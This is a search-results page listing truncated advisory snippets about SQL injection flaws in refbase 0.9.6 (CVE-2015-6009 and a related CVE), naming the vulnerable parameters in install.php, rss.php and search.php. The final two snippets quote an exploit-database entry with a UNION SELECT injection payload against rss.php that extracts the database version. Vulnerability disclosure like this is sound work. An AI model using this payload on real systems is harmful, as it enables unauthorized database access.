5 matches found
Sql injection
SQL injection vulnerability in install.php in Web Reference Database aka refbase through 0.9.6 allows remote attackers to execute arbitrary SQL commands via the defaultCharacterSet parameter, a different issue than CVE-2015-6009...
CVE-2015-6009
Multiple SQL injection vulnerabilities in Web Reference Database aka refbase through 0.9.6 allow remote attackers to execute arbitrary SQL commands via 1 the where parameter to rss.php or 2 the sqlQuery parameter to search.php, a different issue than CVE-2015-7382...
CVE-2015-6009
The vulnerability is in the Web Reference Database (refbase) prior to or up to version 0.9.6. Concrete details from connected sources show that it suffers SQL injection via (1) the where parameter to rss.php and (2) the sqlQuery parameter to search.php, caused by inadequate input filtering. This ...
refbase 0.9.6 - Multiple Vulnerabilities
refbase 0.9.6 - Multiple Vulnerabilities Exploit Title: Refbase 5 /rss.php?where='nonexistent'+union+allselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat'version:',@@version,'',34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50-- - /rs...
refbase 0.9.6 - Multiple Vulnerabilities
Exploit Title: Refbase 5 /rss.php?where='nonexistent'+union+allselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat'version:',@@version,'',34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50-- - /rss.php?where='...